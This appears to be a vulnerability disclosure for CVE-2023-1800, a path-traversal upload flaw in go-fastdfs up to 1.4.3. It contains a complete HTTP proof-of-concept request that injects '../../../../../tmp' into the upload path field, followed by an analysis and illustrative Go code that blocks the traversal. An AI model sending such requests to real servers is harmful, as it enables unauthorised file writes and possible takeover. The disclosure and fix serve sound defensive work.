CVE-2023-1800: ForCVE/2023-0x05.md at main · yangyanglo/ForCVE
A vulnerability, which was classified as critical, has been found in sjqzhang go-fastdfs up to 1.4.3. Affected by this issue is the function upload of the file /group1/uploa of the component File Upload Handler. The manipulation leads to path traversal: '…/filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224768.
go-fastdfs Arbitrary file upload vulnerability
go-fastdfs is a distributed file system based on the HTTP protocol. It is designed around the principle of simplicity, which makes it easier to operate, maintain and expand. Its stated advantages include high performance, high reliability, a decentralized (no-center) design and maintenance-free operation. There is an arbitrary file upload vulnerability in go-fastdfs version 1.4.3 and earlier. Unauthenticated attackers can directly upload arbitrary files to the system and use this to execute commands remotely.
https://github.com/sjqzhang/go-fastdfs/
version go-fastdfs <= v1.4.3
POST /group1/upload HTTP/1.1
Host: ip:8080
Content-Length: 951
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream

success
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="scene"

default
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="filename"

test
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="output"

json2
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="path"

../../../../../tmp
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="auth_token"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryigj9M9EJykZc9u53--
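Vulnerability analysis:
The upload handler does not filter the client-supplied path value, so "../" sequences in it are accepted and the uploaded file can be written outside the storage directory (path traversal).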
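
The missing check, as an added example in Go (the project's language). This is not go-fastdfs's own code: the function names unsafeJoin and safeJoin and the storage root /data/files are hypothetical, and the field values are the ones from the request above.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrTraversal reports a destination outside the storage root.
var ErrTraversal = errors.New("upload path escapes storage root")

// unsafeJoin models the flaw: client fields are joined to the root unchecked.
func unsafeJoin(root, scene, userPath, name string) string {
	return filepath.Join(root, scene, userPath, name)
}

// safeJoin builds the destination from the same fields and rejects any
// result that is not inside root. The check is lexical: it does not resolve
// symlinks that already exist under root.
func safeJoin(root, scene, userPath, name string) (string, error) {
	// The stored file name must be a single path component.
	if name == "" || name == "." || name == ".." || name != filepath.Base(name) {
		return "", ErrTraversal
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	dest := filepath.Join(absRoot, scene, userPath, name)
	rel, err := filepath.Rel(absRoot, dest)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return dest, nil
}

func main() {
	root := "/data/files" // constructed storage root, not go-fastdfs's real layout
	// Field values taken from the request shown on this page.
	fmt.Println("unchecked:", unsafeJoin(root, "default", "../../../../../tmp", "test"))
	_, err := safeJoin(root, "default", "../../../../../tmp", "test")
	fmt.Println("checked:  ", err)
	dest, _ := safeJoin(root, "default", "2023/03", "test")
	fmt.Println("checked:  ", dest)
}
```

The scene and filename fields are client-controlled in the same request, so the containment check covers the whole joined path and not only the path field.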